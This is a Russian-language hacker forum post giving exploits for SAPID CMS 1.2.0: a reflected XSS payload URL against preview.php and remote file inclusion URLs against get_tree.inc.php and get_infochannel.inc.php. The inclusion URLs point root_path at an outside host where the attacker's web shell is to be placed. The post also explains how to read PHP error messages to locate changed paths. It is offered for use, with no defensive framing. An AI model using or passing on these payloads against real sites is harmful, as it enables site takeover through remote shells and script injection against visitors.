|
Инклуд в SAPID Version 1.2.0
SAPID Version 1.2.0 (_http://sapid.sf.net/)
(1) ...: Лже-инклуд :... http://bug.ru/usr/system/preview.php?name="><h1>xss(инклуд, толку от которого нет. Поэтому используем для Passive XSS). Ну и можно посмотреть установочный путь... (2) ...: Полноценный инклуд :... http://bug.ru/usr/extensions/get_tree.inc.php?root_path=http://ya.ru/ http://bug.ru/usr/extensions/get_infochannel.inc.php?root_path=http://ya.ru (В то время как ваш шелл должен быть тут: http://ya.ru/usr/system/common_extfunctions.inc.php) Если вдруг админ изменил путь, но багу не прикрыл(врятли такое может быть), путь, который открыть бажный скрипт вы увидите, обратившись к нему без параметров. Тогда вы увидите уже привычные и радующие глаз строчки, указывающие на этот самый изменённый путь: Warning: main(usr/system/common_extfunctions.inc.php): failed to open stream: No such file or directory in z:\home\bug.ru\www\xex\usr\extensions\get_tree.inc .php on line 11 Warning: main(): Failed opening 'usr/system/common_extfunctions.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in z:\home\bug.ru\www\xex\usr\extensions\get_tree.inc .php on line 11 _Я__З_Н_А_Ю_, ЧТО УЖЕ ЕСТЬ ВЕРСИЯ 1.2.3 !!! НО!!! Уязвимостей к этой версии движка в багтраках я не нашёл (именно тех инклудов, что я вам сейчас показал), поэтому меня терзают смутные сомнения, что эту багу прикрыли без лишнего шума, как это уже было с phpBB (если я не ошибаюсь, именно там как-то нашли инклуд, но бага осталась в привате, а в паблик она попала через одно видео на xakep.ru) p.s. если же я всё-таки пропустил ленту с этим багом, извиняйте... |
| Время: 10:51 |